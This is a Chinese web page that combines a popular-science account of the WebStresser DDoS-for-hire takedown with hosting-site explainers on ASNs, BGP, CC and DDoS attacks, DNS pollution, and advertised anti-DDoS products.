2017年10月,英国某银行忽然遭受网络攻击,损失惨重。 报案后,英国国家犯罪局(以下简称「NCA」)发现案件跟一个名为 WebStresser(网络压力测试) 的网站密切相关。 顺着网站域名注册信息,警方定位到荷兰的某个小村庄。 于是他们联系上荷兰高科技犯罪组,双方计划展开联合调查,并把这次行动称为「断电行动」。 很快,他们确认了网站运营者的身份和所处的位置。但并没有立即抓人,而是开始了细致的调查和取证,他们要摸清平台如何运营,以及拿到犯罪证据。 搜集铁证,对于任何一次抓捕都极其重要。很多网络犯罪分子会把自己包装成合法生意,然后依靠巧舌如簧的律师逃避法律制裁。 经过一番调查后警方发现,该平台自称经营一种「网站压力测试」服务,号称能帮网站测试服务器和带宽的网络流量承载能力: “我们提供最强大、最可靠的服务器测试,横跨三大洲,一天24小时,一周7天的无间歇服务。” 在普通人看来,这似乎是个合法生意,可稍微「懂行」的人都明白,这特么就是个网络打手平台,上面那句的真实含义是: “我们提供最强大的网络流量攻击,横跨三大洲,一天24小时随时发起,一周7天的无间歇服务,一打一个瘫。” 这就是典型的 DDoS 网络流量攻击,网络世界里最常见又最令人头疼的问题。 如果把互联网上的网站或服务器看作一个个商店(比如淘宝、京东、微信等等),每个访问网站的网民看作是商店里的顾客。DDoS 就相当于一堆小混混装成正常顾客涌入商店,逛来逛去赖着不走让正常的顾客进不来,或者跟售卖员有一搭没一搭地说话,占用他们的时间,让他们无法正常服务客户。 在真实场景中,攻击者用大量机器或软件在短时间内对某个目标大量访问,让对方的服务器和带宽承受不了而崩溃。 而这个名叫 Webstresser 的平台掌握了大量"网络打手资源"。 这些"打手"有的是一些服务器,有的可能是马路上某个被黑掉的摄像头、某个人家里被黑掉的路由器、智能电视、空气净化器甚至智能电饭煲……成千上万台的设备共同组成了一个巨大的网络大军,在平台的统一发号施令下,随时对网络上的任意目标发起大量访问请求,形成DDoS攻击。 WebStresser 平台不仅把网络攻击做成了明码标价的服务,而且使用门槛特别低。 哪怕是一点技术都不懂的小白,只要他有犯罪意图,花点小钱就能在网上发起一波强力网攻势。 要知道,DDoS 最可怕之处就在于虽然攻击成本很低,但是防御它所需要的成本却很高,造成的损失往往也非常可怕。 一款游戏、一个视频网站如果时不时地来个网络波动,玩家很快就会流失掉一大半。一个金融网站,如果经常网页打不开,用户甚至压根都不敢用…… 甚至,只要流量足够大,几波 DDoS 攻击甚至能造成整个城市甚至国家的大面积网络事故。很难想象,2017年发生的美国大断网事件,就是由三个美国大学生用DDoS攻击造成的。(可参看我们之前写过的:《黑客的滑铁卢——大断网全纪实》) 为什么这些人如此明目张胆? 首先是因为 DDoS 攻击溯源成本很高,就好比现实生活中有人把你拉到巷子里打一顿就跑了,你很难知道打手是谁派来的。 有些善于隐藏的攻击者还会设置很多层服务器作为跳板,即便查到了发起攻击的服务器地址,那个服务器也可能只是个跳板。 (图片源自网络) 甚至即便是抓到人,也可能只是个底下干活的小马仔。 即便警察最终查到幕后大BOSS,对方也很可能身处异国他乡。由于国家涉及主权问题,警方开展跨国追捕并不容易。 - 收网 - 不过,在那次“断电行动”中,犯罪分子最终还是栽了…… 我估计他们万万没想到,这次跨国追捕的规模居然如此庞大,涉及到那么多犯罪打击机构…… (该平台被端掉之后,官网整齐排列着18个机构的标志) 最终,在英国国家犯罪局(NCA)、荷兰高科技犯罪组以及欧洲刑警组织及其他执法部门的密切配合下,耗时数月终于将犯罪嫌疑人抓捕。 直到核心犯罪嫌疑人被捕归案,人们才知道,这个平台的管理员居然是个年仅19岁的少年……. 而这个平台竟有超过 136000 名用户,发起过超过 600万起网络攻击,绝对可以称得上是全球最大的 DDoS 交易网站。 由于平台规模太大,他们甚至还有不少中间代理商在其他国家开了网站,专门倒卖他们的 DDoS 服务…… 警方还发现,这个平台除了攻击过一些常规网站、游戏服务器,还受雇攻击过许多银行、警察部门、政府机构。 仅仅在 2017年7月的一个月内,就有人租用该平台服务攻击了英国最大的 7 家银行,导致银行部分业务中断,造成数十万美元的经济损失。 没过多久,警方在英国、加拿大、克罗地亚和塞尔维亚四个国家逮捕了多名同伙,同时还去美国、英国和中国香港等国家和地区‘拜访’了不少购买过 DDoS 服务的人,直接抓捕了其中两人并警告了其他人。 抓捕行动之后的一段时间,有相关机构发布报告表示,整个欧洲的DDoS攻击在那之后大幅下降了60%。 在法庭上,被告们的律师依然声称 WebStresser 只是对外提供压力测试,完全合理合法,只是看样子法官和警察都不再吃这套了…… - 无限追捕 - 故事到这本该圆满结束,案件告破,坏人得到应有惩治,完美大结局。 但是,发布报告的那家公司又指出,DDoS 攻击下降60% 只是暂时现象,他们预计很快就会有新的平台出现,以填补 WebStresser 突然关闭造成的缺口。 言外之意,市场对于网络打手的需求依然很大,死掉一个 WebStresser,还会涌现千千万万个。 那么在国内,这种情况也会出现吗? 就着这个问题,我去请教了知道创宇的安全专家西盟,他们公司是目前国内反DDoS方面水准公认顶尖的。 西盟告诉我,在中国同样存在许多这样的网络打手平台。他们有的会对外声称是压力测试服务,有的则是明目张胆。 “DDoS 攻击目前已经高度产业化。” 我试着点进其中一个“大金DDoS平台”,服务模式和 WebStresser 非常类似,网络攻击服务明码标价公开售卖,并且价格并不算贵。 西盟说,这些攻击背后其实是网络犯罪的真实写照,他们有的是商业竞争,有的是网络敲诈。不少公司最后不得不硬抗巨额损失,或者花钱消灾。 就在上个月,国内多家直播平台就遭遇了大规模流量攻击,攻击手法刁钻。 然后就在前几天(2018年5月中旬),知名IT博主阮一峰的博客站遭遇“网络打手”,网站被迫暂时下线。随后他发现许多IT教育类网站也同样遭到攻击。 显然这并非偶然,而是蓄意攻击。 但是,发起 DDoS 的犯罪团伙并非毫无破绽。 西盟说去年他们就曾协助陕西化阴警方破获过一起DDoS网络攻击案件,还协助警方破获过轰动一时的E租宝雇佣黑客对网贷之家发起DDoS攻击一案。 但是他也承认,更多的时候攻击者和防御者就像是一场猫鼠游戏,虽然猫可以抓住老鼠,但是老鼠太多太多,洞太深、跑得又快,还不断繁衍。 而且,抓老鼠只能由公安来抓,受害企业和安全企业都不能直接抓老鼠,大多时候只能“广积粮、筑高墙”。 所谓“广积粮”,是指提高设备性能和带宽,直接硬扛流量攻击;而“筑高墙”可以简单理解为利用专门的防火墙、流量清洗技术来抵御攻击。限于篇幅这里就不细致展开。 不过总的来说,这一次荷兰警方干的很漂亮,端掉了一个大的老鼠窝,给了犯罪分子一个不小的震慑。 犯罪风险和成本提高了,犯罪频率自然也就会下降。 但长远看来,未来还需要更多警方、网络安全公司以及其他相关人员不懈努力! 打击网络犯罪这条路,其实才刚刚开始…… 最后再介绍一下我自己吧,我是谢幺,科技科普作者一枚,日常是把各种技术讲得连女朋友都能听懂。如果有什么有意思的科技问题,可以在知乎@谢幺,或者搜索微信:dexter0。不想走丢的话,请关注【浅黑科技】! 近两年DDoS攻击的著名案例 1、2016年5月,不法黑客针对全球范围内的多家银行网站发动了一系列的DDoS攻击。导致约旦、韩国以及摩纳哥等央行网络系统陷入了半小时的瘫痪状态,无法进行正常工作。 2、2016年11月,俄罗斯五家主流银行遭遇长达两天的DDoS攻击。来自30个国家2.4万台计算机构成的僵尸网络持续不断发动强大的DDOS攻击。 3、2017年4月初,江苏省某网络公司服务器频繁遭到DDoS流量攻击,导致挂载在服务器上的多个网站无法正常运营,损失严重。 4、2018年3月,Github遭受了迄今为止记录的最大的DDoS攻击。攻击者通过公共互联网发送小字节的基于UDP的数据包请求到配置错误的memcached服务器,作为回应,memcached服务器通过向Github发送大量不成比例的响应,形成巨大规模的DDoS攻击。 #### 什么是.com域名?什么样的.com域名值得购买 .com是互联网上最常用的顶级域名之一,用于商业和个人网站。它最初在1985年由美国国家科学基金会分配,现在是由互联网名称与数字地址分配机构(ICANN)管理。由于它的流行和广泛使用,许多人认为.com是互联网上最有价值的域名之一。 购买.com域名的最佳方法是首先确定您的目标受众,并确保域名与您的品牌或业务紧密相关。您的域名应该是独特而易于记忆,简短而且易于拼写。建议避免使用过长或复杂的域名,因为这会让用户难以记住或拼写。此外,您可能需要考虑使用关键字来增加您的网站的搜索引擎排名。 最后,重要的是要选择一个可靠的域名注册商,以确保您的域名在注册期内保持安全。在购买域名之前,请确保了解相关的注册费用和续期费用,以及域名所有权转移的流程和费用。 #### 什么是ASN 如何查询ASN 以及各大云服务商的ASN多少 在网络安全中ASN拦截是一个不错的方法,那么什么是ASN呢?我们来全面地讲解一下ASN,包括其定义、查询方法以及主流云服务商的ASN信息。 第一部分:什么是ASN? ASN 的全称是 自治系统号。理解它需要先理解两个概念: 自治系统(AS) 互联网不是单一网络,而是由成千上万个独立的网络连接而成。 一个自治系统(AS) 就是一个或多个由单一实体(如一家ISP、一所大学、一家大公司) 管理和控制的大型网络。 例子: 中国电信的网络是一个AS。 谷歌的全球数据中心网络是一个AS。 腾讯的网络是一个AS。 自治系统号(ASN) 为了在全球互联网中唯一标识每个自治系统,每个AS都会被分配一个全球唯一的号码,这就是 ASN。 它就像是每个大型网络的“身份证号”或“邮政编码”。 ASN的核心作用:驱动BGP协议 BGP 是互联网的“导航系统”,负责在不同AS之间交换路由信息。 当两个AS(例如中国电信和谷歌)互联时,它们会用BGP协议告知对方:“我的ASN是XXXX,我负责这些IP地址段。” 简而言之:ASN是BGP路由的基石,没有它,互联网就无法高效地找到路径。 总结比喻: IP地址 = 街道门牌号(标识一台具体设备) ASN = 邮政编码(标识一个庞大的网络区域) BGP = 邮局分拣系统(根据邮政编码决定信件如何流转) 第二部分:如何查询ASN? 查询ASN非常简单,有多种免费工具可供使用。 方法一:通过专业在线网站查询(最推荐) BGP.Tools 网址:https://bgp.tools 用法:在首页搜索框直接输入IP地址、域名或公司名称。 优点:信息极其丰富、直观,包括ASN的归属、前缀、对等互联关系等,是网络专业人士的首选。 Hurricane Electric BGP Toolkit 网址:https://bgp.he.net 用法:同样在搜索框输入IP或域名即可。 优点:老牌、强大的查询工具,同样提供详细信息。 方法二:使用命令行工具(适合技术人员) whois 命令 在Windows(命令提示符或PowerShell)、Linux或macOS的终端中直接输入:bash whois -h whois.radb.net 8.8.8.8(将 8.8.8.8 替换为你想查询的IP地址或AS号,如 AS15169) traceroute 命令 在终端中运行,可以显示数据包经过的路径,其中通常会包含经过的ASN。bash traceroute google.com # 或者使用更现代的版本 mtr google.com 方法三:通过IP信息查询网站 像 ipinfo.io、ipapi.co 这样的网站,在查询IP地址的详细信息时,通常也会返回该IP所属的ASN和网络组织名称。 第三部分:各大云服务商的ASN是多少? 以下是全球主流云服务商及其主要ASN的列表。请注意,大型云厂商通常拥有多个ASN用于不同区域或服务。 云服务商主要 ASN归属组织 / 网络名称Amazon Web Services (AWS)AS16509AMAZON-02 - Amazon.com, Inc.AS14618AMAZON-AES - Amazon.com, Inc.Google CloudAS15169GOOGLE - Google LLCMicrosoft AzureAS8075MICROSOFT-CORP-MSN-AS-BLOCK - Microsoft CorporationAS5761MICROSOFT-GLOBAL-NET - Microsoft Corporation阿里云AS45102ALIBABA-CN-NET Hangzhou Alibaba Advertising Co.,Ltd.腾讯云AS132203TENCENT-CLOUD-NET-AP Tencent Cloud, USAS45090TENCENT-NET-AP Shenzhen Tencent Computer Systems Company LimitedOracle CloudAS31898ORACLE-BMC-31898 Oracle Public CloudIBM CloudAS36351SOFTLAYER - SoftLayer Technologies Inc.CloudflareAS13335CLOUDFLARENET - Cloudflare, Inc. 如何使用这个信息? 当你看到网络流量来源于上述ASN时,你就知道它来自哪个云平台。这在以下场景非常有用: 安全分析:识别可疑流量是否来自某个云平台(例如,攻击者可能利用云服务器发起攻击)。 网络排查:判断访问延迟或中断是否与特定云服务商的网络有关。 策略制定:在防火墙或访问控制列表中,允许或阻止特定云服务商的IP段(通常需要结合其IP地址范围,ASN是一个很好的起点)。 重要提示: 这个列表只包含了最主要、最常见的ASN。 大型云厂商通过对等互联与全球数千个其他网络直接连接,因此你访问其服务时,流量可能不直接经过其主ASN,而是通过更优的路径到达。 #### 什么是BGP,BGP机房是什么意思? BGP(边界网桥协议)是一种用于连接Internet上的自治系统(Autonomous System,简称AS)的路由选择协议,主要用于互联网AS之间的互联。 BGP机房则是采用BGP协议来实现双线路或多线路互联,实现在各运营商网络线路之间实现互联,让用户可以实现在各线路之间的快速切换访问,提高了用户访问的速度和稳定性. BGP的最重要的功能在于控制路由选择和传播,它能选择并传播最优的路由,以确保网通、电信用户访问网站的高速访问, 这是传统双IP协议无法相比的优势: 实现高速的单Ip访问:BGP机房可以让服务器的上行路由和下行路由都能选取最优的路径,从而实现真正的高速的单IP访问. 冗余备份、消除循环:当一条线路出现问题时,BGP机房可以自动切换到其他线路上,从而避免了网络的中断. 网络扩展性强:使用BGP协议可以轻松实现单IP与多线路的互联,使得所有互联运营商的网络用户都能快速访问网站. 总的来说,BGP机房在网络性能和稳定性上具有明显的优势,特别是在处理大规模的多线路互联时,BGP的优势更加明显。 #### 什么是CC攻击?CC攻击原理种类与防御 近几年,随着互联网的发展给我们带来极大的便利,但是同时也带来一定的安全威胁,网络恶意攻击逐渐增多,很多网站饱受困扰,而其中最为常见的恶意攻击就是cc以及ddos攻击。对于一些防御能力较弱的网站来说,一旦遭遇这些攻击,轻则网站瘫痪,重则直接影响生存。那么什么是CC攻击?今天主机吧就来给大家详细解析下CC攻击。 CC攻击介绍 CC攻击其前身名为Fatboy攻击,是利用不断对网站发送连接请求致使形成拒绝服务的目的。由于在DDOS攻击发展前期,抗拒绝服务攻击系统所防护,于是在黑客们研究出一种新型的针对http的DDOS攻击后,即命名Challenge Collapsar,后来大家就延用CC这个名称至今。 CC攻击的原理 CC攻击的原理就是攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽,一直到宕机崩溃。CC主要是用来消耗服务器资源的,每个人都有这样的体验:当一个网页访问的人数特别多的时候,打开网页就慢了,CC就是充分利用了这个特点,模拟多个用户不停的进行访问(访问那些需要大量数据操作,就是需要大量CPU时间的页面)造成服务器资源的浪费,CPU长时间处于100%,永远都有处理不完的连接直至就网络拥塞,正常的访问被中止。 CC攻击的种类 CC攻击的种类有四种,直接攻击、代理攻击、僵尸网络攻击、肉鸡攻击。 1、直接攻击主要针对有重要缺陷的 WEB 应用程序,一般说来是程序写的有问题的时候才会出现这种情况,比较少见。 2、代理攻击是黑客借助代理服务器生成指向受害主机的合法网页请求,实现DOS和伪装。 3、僵尸网络攻击有点类似于 DDOS 攻击了,从 WEB 应用程序层面上已经无法防御,所以代理攻击是CC 攻击者一般会操作一批代理服务器,比方说 100 个代理,然后每个代理同时发出 10 个请求,这样 WEB 服务器同时收到 1000 个并发请求的,并且在发出请求后,立刻断掉与代理的连接,避免代理返回的数据将本身的带宽堵死,而不能发动再次请求,这时 WEB 服务器会将响应这些请求的进程进行队列,数据库服务器也同样如此,这样一来,正常请求将会被排在很后被处理,这时就出现页面打开极其缓慢或者白屏。 4、肉鸡攻击一般指黑客使用CC攻击软件,控制大量肉鸡发动攻击,相比代理攻击更难防御,因为肉鸡可以模拟正常用户访问网站的请求,伪造成合法数据包。 CC攻击与DDOS的区别 CC攻击可以归为DDoS攻击的一种。其目的都是消耗服务器资源,造成服务器宕机崩溃。不同的是DDOS是针对IP地址发起的攻击,CC是针对服务器端口发攻击的攻击。   CC攻击的防御 目前CC攻击防御有+种: 1、软件防御 利用安装在服务器上的防火墙进行拦截,主要代表安全狗、云锁等软件,这类防御适用于CC攻击较小,而且CC特征明显的攻击。 2、网站程序防御 利用网站程序限制IP访问频率,并对程序进行优化进少,生成纯静态页,减少动态情况,可一定程度上减少CC攻击的压力。 3、云防火墙  如高防CDN、高防IP,高防CDN会对CC攻击访问进行拦截,对正常访客放行,同时利用边缘节点缓存网站资源,适用于网站被大量CC攻击防御,主要代表百度云加速、抗D宝。高防IP则是DDOS防火墙,利用高带宽、高硬防的特点,对CC攻击进行识别拦截,如正常用户就放行,也适用于被大量CC攻击防御,主要代码阿里云DDoS高防IP 、腾讯云DDoS高防IP,不过价格相对较贵。 #### 什么是CC攻击?我们如何解决超大CC攻击? 什么是CC攻击? DDoS攻击有很多种,CC攻击属于DDoS应用层攻击。 当发生 CC 攻击时,会同时发送多个 HTTP 请求以使服务器过载,因为统一资源标识符 (URI) 必须执行复杂的算法或数据库操作才能耗尽目标 Web 服务器的资源。 想象一下多辆导弹卡车在您的网站上开火 攻击者模拟大量用户一直在访问页面的场景。 因为访问的页面需要大量的数据操作(消耗大量CPU资源),所以CPU使用率一直保持在100%的水平,直到正常的访问请求被阻塞。 有趣的事实: CC 攻击在 2004 年被称为“Challenge Collapsar”攻击,当时一位名叫 Kiki 的中国黑客发明了一种名为 Collapsar 的黑客工具,能够通过 HTTP 请求对服务器进行闪电战。 我们在一段时间内看到的最大的 CC (DDoS) 攻击之一 我们的客户尝试了他们能想到的一切来缓解攻击:他们试图通过内部 DDoS 缓解措施来解决问题,并使用了声称可以帮助缓解 DDoS 攻击的内容分发网络 (CDN) 服务和提供商。 但是每次尝试都失败了,他们的网站在重新启动后几分钟后就会关闭。 当客户来找我们帮助解决他们的问题时,我们立即采取行动减轻攻击。 经调查,我们对这次 DDoS 攻击的大规模感到惊讶:每分钟向我们客户的服务器发送 3 亿个请求,黑客正在利用“用户模仿”,这种做法将攻击流量掩盖为正常用户流量分发跨多个 IP 地址。 大约 1.3 Tbps 的网络攻击 大约 300M QPM 的应用程序攻击 即使在这种蛮力 CC 攻击期间,我们也能够减轻攻击并让我们客户的站点重新启动并运行。 我们如何减轻攻击 我们使用双管齐下的 DDoS 保护方法来缓解这种特殊的 CC 攻击: 地理限制 :我们能够通过保护来自主要用户群所在国家和地区的流量以及阻止来自俄罗斯、乌克兰和印度等已知“攻击地区”的流量来限制特定区域的传入流量。启用基于浏览器的质询 :我们的 Web 应用程序防火墙 (WAF) 允许我们使用基于质询的算法来过滤 CC 攻击机器人。 建立在最大防御2T的高防IP,采用人机识别对抗算法,防御过程正常用户无感知。 正是这种力量让我们抵御了每分钟 3 亿次请求的 CC 攻击。 通过将有效过滤与我们网络的强大功能相结合,我们能够帮助我们的客户吸收强大的 CC 攻击,并让他们的网站恢复正常运行。 #### 什么是ddos攻击,常见的防御方法 DDOS攻击定义 分布式拒绝服务(Distributed Denial of Service,简称DDoS)攻击是一种常见的网络攻击方式,攻击者通过控制网络中不同位置的多台主机同时向受害者实施攻击,利用资源的不对称,产生庞大的攻击流量,造成服务瘫痪,从而阻止合法用户正常访问目标服务。 DDOS攻击常见手段 DDOS攻击的常见手段包括: SYN Flood:利用TCP协议的原理,主要是通过向受害主机发送大量伪造源IP和源端口的SYN或ACK包,导致主机的缓存资源被耗尽或忙于发送回应包而造成拒绝服务。 UDP Flood:攻击者利用UDP无状态的特点,向服务器的不同端口发送大量的UDP数据包,导致服务器的网络资源被耗尽。 ICMP Flood:利用ICMP协议,发送大量的ICMP报文,占用服务器的网络资源,导致正常的网络服务无法进行。 DDOS攻击防御方法 针对DDOS攻击,常见的防御方法包括: 网络拓扑设计:采用多层次防护策略,采用防护设备在不同环节对此类攻击进行拦截。 增加临时缓冲区:当发现DDoS攻击开始发生时,立即增加大量缓冲区,以减轻攻击时产生的压力。 利用流量分析技术,分析攻击的流量源,及时隔离源站,切断攻击流量的通道。 接入ISP边界上,可采用防护设备进行包过滤和连接限制,规定每秒连接数,对连接数进行限制。 使用“黑洞路由”技术,使用路由器对流量进行检测,发现并记录攻击流量,转发至“正式黑洞”IP地址,将攻击流量丢弃。 预防性措施:通过网络安全漏洞扫描、系统安全漏洞扫描、网络流量监测等多种手段,尽量预防DDoS攻击的发生。 使用高防IP、高防CDN和高防服务器:这类服务通常会提供更专业的防御措施和技术,可以有效地抵御DDoS攻击。 以上是一些常见的防御方法,但需要注意的是,由于DDoS攻击的复杂性和多样性,完全防止DDoS攻击是不可能的,只能通过综合多种防御手段,尽可能地降低DDoS攻击对网络服务的影响。 服务推荐 高防IP:https://zhujib.com/gaofangip.html 高防CDN:https://zhujib.com/jdxingdun.html 高防服务器:https://www.suduwangluo.com/ecc/custom-purchase.html #### 什么是DDoS攻击?被DDoS攻击的表现和常见攻击手段 什么是DDoS? DDoS 最早可追溯到1996年,在2002年中国开始频繁出现,2003年已经初具规模。DDoS即分布式拒绝服务攻击英文缩写,指以分散攻击源来黑进指定网站的黑客方式。总之DDoS会想办法让目标机器停止提供服务或资源访问。 常见被攻击表现: (1) 被攻击主机上有大量等待的TCP连接; (2) 网络中充斥着大量的无用的数据包; (3) 源地址为假 制造高流量无用数据,造成网络拥塞,使受害主机无法正常和外界通讯; (4) 利用受害主机提供的传输协议上的缺陷反复高速的发出特定的服务请求,使主机无法处理所有正常请求; (5) 严重时会造成系统死机。 攻击类型: 普通DDoS 普通拒绝服务攻击是指一些传统的攻击方式,如SYN FLOOD攻击、ACK FLOOD攻击、CC攻击、UDP FLOOD攻击等等。 新型DDoS Websocket、临时透镜、慢速DDoS、ReDOS DDoS按拒绝对象又可以分为: 带宽消耗型攻击(应用于网络层攻击) 洪水攻击:UDP、ICMP、ping of death 放大攻击:NTP、DNS 资源消耗型攻击(应用于应用层攻击) 包括SYP洪水、LAND atthack和CC攻击。 常见攻击手段: SYN/ACK Flood 攻击 DDoS攻击最经典有效的手段,可通杀各种系统的网络服务,主要是通过向受害主机发送大量伪造源IP和源端口的SYN或ACK包,导致主机的缓存资源被耗尽或忙于发送回应包而造成拒绝服务,由于源都是伪造的故追踪起来比较困难,缺点是实施起来有一定难度,需要高带宽的僵尸主机支持。普通防火墙大多无法抵御此种攻击。 UDP FLOOD攻击 UDP FLOOD攻击顾名思义是利用UDP协议进行攻击的,UDP FLOOD攻击可以是小数据包冲击设备也可以是大数据包阻塞链路占尽。 CC攻击 CC攻击的原理是通过代理服务器或者大量肉鸡模拟多个用户访问目标网站的动态页面,制造大量的后台数据库查询动作,消耗目标CPU资源,造成拒绝服务。 DDoS的防御 目前业内主流的防御手段有三种,使用高防服务器、高防CDN、高防IP。 高防服务器是指独立单个防御50G以上的服务器类型,可以为单个客户提供网络安全维护的服务器类型。总体来看属于服务器的一种,根据各个IDC机房的环境不同,有的提供有硬防,有使用软防。简单来说,就是能够帮助网站拒绝服务攻击,并且定时扫描现有的网络主节点,查找可能存在的安全漏洞的服务器类型,都可定义为高防服务器。 高防ip是指高防机房所提供的ip段,主要是针对网络中的DDoS攻击进行保护。用户可用高防IP进行业务转发,并隐藏源服务器IP,达到替身防御作用。 而高防CDN则是通过多个高防IP集群对内容进行转发,并隐藏源服务器IP,具有加速、安全一体的服务。比如百度云加速就这类产品。 百度云加速为用户提下以下三大类功能: 1、网站加速 百度云加速节点遍布全中国,通过智能DNS解析等技术,将访问网站的用户引导至最快的节点,通过动静态加速及页面优化技术,大大提高网站的访问速度和用户体验。此外,还可以大量节省网站自身的服务计算和带宽资源。 2、安全防护 百度云加速可以同时防护包括SQL注入、XSS、Web服务器漏洞、应用程序漏洞以及文件访问控制等问题在内的十多种黑客渗透攻击和SYN Flood、UDP Flood、ICMP Flood、TCP Flood以及CC在内的多种DDoS攻击。 3、SEO 百度云加速的百度蜘蛛DNS同步功能,可以做到和百度蜘蛛实时同步DNS信息,保证百度蜘蛛的正常抓取,保证搜索引擎权重的稳定性;通过死链自动提交、sitemap自动提交,及时收录网站信息,提高网站索引量。   #### 什么是DDoS攻击?要怎么防御? 在数字化浪潮席卷全球的今天,网络服务的中断意味着业务停滞、品牌受损和巨大的经济损失。分布式拒绝服务(DDoS)攻击,作为一种古老却历久弥新的网络威胁,始终是高悬于企业头上的达摩克利斯之剑。本文将深入浅出地剖析DDoS攻击的原理,并为您提供一套行之有效的防御策略,同时介绍几款国内领先的云防护解决方案。 第一部分:DDoS攻击是如何发生的? DDoS攻击的核心目的非常简单:通过海量的无效流量耗尽目标服务器、网络带宽或应用资源的处理能力,从而导致合法用户无法正常访问服务。这就像一家热门餐厅突然涌入成千上万只占座不点餐的“假顾客”,让真正的食客无法进门。 其攻击过程通常分为以下几个步骤: 构建僵尸网络(Botnet):攻击者并不会使用自己的电脑直接攻击。他们会先通过病毒、木马等方式,控制互联网上成千上万台存在安全漏洞的设备(如服务器、个人电脑、摄像头、路由器等IoT设备)。这些被控制的设备被称为“肉鸡”或“僵尸节点”,它们组成的网络即为“僵尸网络”。 发起攻击指令:攻击者通过一台或多台“命令与控制服务器(C&C Server)”向整个僵尸网络下达攻击指令,包括攻击目标(IP或域名)、攻击类型和持续时间。 洪水般的流量冲击:所有被控制的“肉鸡”在接收到指令后,会同时向目标发送大量看似合法的网络请求数据包。这些流量从四面八方汇聚到目标一点,形成巨大的流量洪峰。 根据攻击的层次和目标,DDoS攻击主要分为三类: 网络层攻击(Volume-Based Attacks):以消耗带宽为目标。最常见的是UDP洪水和ICMP(Ping)洪水攻击。攻击者发送大量无连接或不需要回应的数据包,堵塞目标网络的“车道”,让正常数据无法通行。 协议层攻击(Protocol Attacks):以消耗服务器等中间设备的资源为目标。典型的如SYN洪水攻击:它利用TCP三次握手的机制,只发送初始的SYN包却不完成握手,导致服务器维持大量半开连接,最终资源耗尽。 应用层攻击(Application-Layer Attacks):最复杂、最难防御的攻击。它模拟正常用户行为,针对特定的应用(如Web服务器、数据库、DNS服务器)发起低频但精准的请求(如频繁搜索、刷新页面、登录尝试)。因为每个请求都看起来像合法业务,所以很难被传统防火墙识别。CC攻击就是应用层攻击的典型代表。 第二部分:如何更有效地预防DDoS攻击? 传统的依靠增加带宽和本地防火墙的防御方式在 modern, large-scale DDoS attacks 面前早已力不从心。有效的防御必须基于“云地结合、智能清洗”的理念。 基础架构优化: 提升冗余和扩展性:采用负载均衡和分布式架构,避免单点故障。在云上部署服务可以更容易地实现弹性扩容。 隐藏真实服务器IP:切勿将源站服务器的真实IP直接暴露在公网上。所有对外服务都应通过域名访问,并将域名解析到高防IP或CDN节点上。 拥抱云端防护服务(核心策略):这是当前最主流、最有效的防御方式。其原理是将流量先引到拥有超大带宽和强大清洗能力的云安全防护中心,恶意流量在云端被识别和过滤后,只有纯净的正常流量会被转发到您的源站服务器。 第三部分:主流云防护产品推荐 选择一款靠谱的云防护产品是构建防御体系的关键。以下是国内三款备受市场认可的优秀产品: 1. 百度云防护 - Web应用防火墙(Baidu Cloud WAF) 核心优势:背靠百度强大的搜索技术和AI能力,其在应对复杂的应用层攻击(CC攻击) 方面表现出色。百度智能云WAF能够深度分析HTTP/HTTPS流量,通过语义分析、行为建模和机器学习算法,精准识别恶意爬虫、SQL注入、跨站脚本(XSS)等Web威胁,同时对CC攻击进行有效缓解。 适用场景:特别适合以Web网站、H5页面、API接口为主要业务的用户,对业务逻辑层面的安全有较高要求的场景。 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 2. 京东云 - 星盾(JD Cloud StarShield) 核心优势:星盾是一款集DDoS防护、Web应用防火墙、Bot管理、CDN加速于一体的一站式边缘安全平台。它借鉴了Cloudflare的理念,将安全能力下沉到全球分布的边缘节点,实现就近接入和防护。其DDoS防护清洗能力强大,能有效应对T级别的大流量攻击,同时整合了WAF的精细化管理规则。 适用场景:适合需要一体化解决方案的用户,既希望获得强大的DDoS mitigation能力,又需要WAF、CDN等增值服务,追求便捷管理和全球覆盖的企业。 京东云星盾 安全加速 SCDN 高防CDN 隐藏IP ddos防御 CC攻击防御[出售] ¥720 ¥900 库存:9.9k 已售:103 人气:4.2 3. 速度网络 - 高防IP & 高防CDN 核心优势:速度网络作为国内老牌的高防服务商,以其专注和性价比著称。其高防IP提供高达T级的单一节点清洗能力,专注于应对网络层和协议层的巨量洪水攻击,硬扛能力强。高防CDN则在提供防护的同时,通过分布式缓存加速网站访问。 适用场景:非常适合游戏、金融、直播等易遭受超大流量DDoS攻击的行业,用户追求极致的防护性能和更具竞争力的价格。 独享高防CDN 独享IP节点 单节点高防 大流量DDOS防护专用[出售] ¥1999 ¥1999 库存:9.9k 已售:688 人气:2.1k 总结与建议 特性对比百度云WAF京东云星盾速度网络高防防护侧重点应用层(CC/Web攻击)综合一体化(DDoS+WAF+CDN)网络/协议层(大流量攻击)核心优势AI智能语义分析、精准CC防护一站式边缘安全平台、功能整合专注高防、清洗能力强、性价比高典型用户Web网站、API服务商寻求全面解决方案的各类企业游戏、直播、金融等高压行业 如何选择? 如果你的业务饱受CC攻击和应用层威胁困扰,百度云WAF是精准的选择。 如果你希望一个产品解决安全、加速等多种需求,追求便捷和全球化,京东云星盾是理想的综合平台。 如果你的业务经常面临TB级别的直接流量轰炸,需要硬核的防护能力且对成本敏感,速度网络的高防IP/CDN值得重点考虑。 最终,没有一劳永逸的安全方案。建议企业采取纵深防御策略,结合自身业务特点选择合适的云防护产品,并定期进行安全评估和渗透测试,才能在这场与攻击者的持续对抗中立于不败之地。 #### 什么是DNS污染?如何防止DNS污染? DNS污染我们叫域名污染,也可以叫DNS缓存投毒,是指一些刻意制造或无意中制造出来的域名服务器数据包,把域名指往不正确的IP地址。一般来说,在互联网上都有可信赖的网域服务器,但为减低网络上的流量压力,一般的域名服务器都会把从上游的域名服务器获得的解析记录暂存起来,待下次有其他机器要求解析域名时,可以立即提供服务。一旦有关网域的局域域名服务器的缓存受到污染,就会把网域内的计算机导引往错误的服务器或服务器的网址。 比较典型的例子就是国外的Facebook、Google、youtube都是因为被DNS污染导致访问不了。这也是国内长城防火墙典型的屏蔽手段。一些非法的国外网站也经常会被国内DNS污染。 如何防止DNS污染? 如果是被国家DNS污染的话,基本上是无解的,除非国家解除封禁。 也有站长反馈给域名更换DNS就可以了,一般48小时左右恢复。不过主机吧测试过,更换DNS只能恢复部分地方访问,并不能彻底解决。 虽然被DNS污染的域名无法解决,但是我们可以预防被污染。 除了内容要符合法律法规外,我们要利用域名DNS的DNSSEC这个功能。 